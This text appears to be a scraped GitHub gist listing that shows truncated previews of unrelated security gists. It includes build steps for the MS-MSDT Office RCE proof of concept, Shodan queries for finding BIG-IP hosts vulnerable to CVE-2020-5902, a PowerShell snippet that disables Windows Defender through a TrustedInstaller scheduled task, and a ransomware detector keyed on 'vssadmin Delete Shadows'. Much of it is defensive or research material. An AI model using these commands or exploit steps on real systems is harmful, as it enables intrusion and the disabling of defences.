Vesselin Bontchev bontchev
tothi / ms-msdt.MD
Last active Sep 12, 2022
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process
MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
nathanqthai /
Last active Sep 3, 2022
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence


Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.


The following section includes Log4Shell samples seen in the wild.

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

gnremy / CVE-2021-44228_IPs.csv
Last active Mar 23, 2022
CVE-2021-44228 Apache Log4j RCE Attempts Dec 20th 9:27PM ET
CSV columns: ip, tag_name (every listed row is tagged "Apache Log4j RCE Attempt")
byt3bl33d3r /
Created Dec 10, 2021
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (
#! /usr/bin/env python3
"""
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
"""
geek-at /
Created Aug 13, 2020
The script used to trash a banking phishing site
while :; do
  verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1)
  pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1)
  ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")
gitdagray / online_offline_detection.js
Last active Sep 26, 2022
Online / Offline Status Detection w/ Async & Await
/* ********** Online / Offline Detection ********** */
// Request a small image at an interval to determine status
// ** Get a 1x1 pixel image here:
// ** Use this code with an HTML element with id="status"
const checkOnlineStatus = async () => {
  try {
    const online = await fetch("/1pixel.png");
    return online.status >= 200 && online.status < 300; // either true or false
  } catch (err) {
    return false; // fetch threw (no network, DNS failure, etc.): report offline
  }
};
cihanmehmet /
Last active Sep 29, 2022
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀

Shodan Search

title:"Big-IP&reg;" org:"Organization Name"
http.title:"BIG-IP&reg;- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"


tyranid / doh.ps1
Created May 4, 2020
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
jthuraisamy /
Last active Oct 19, 2022
GospelRoom: Data Storage in UEFI NVRAM Variables

Persist data in UEFI NVRAM variables.


  1. Stealthy way to store secrets and other data in UEFI.
  2. Will survive a reimaging of the operating system.
Kill-Ransomware.ps1
# Ransomware Killer v0.1 by Thomas Patzke <>
# Kill all parent processes of the command that tries to run "vssadmin Delete Shadows"
# IMPORTANT: This must run with Administrator privileges!
Register-WmiEvent -Query "select * from __instancecreationevent within 0.1 where targetinstance isa 'win32_process' and targetinstance.CommandLine like '%vssadmin%Delete%Shadows%'" -Action {
    # Kill all parent processes from detected vssadmin process
    $p = $EventArgs.NewEvent.TargetInstance
    while ($p) {
        $ppid = $p.ParentProcessID
        $pp = Get-WmiObject -Class Win32_Process -Filter "ProcessID=$ppid"
        Write-Host $p.ProcessID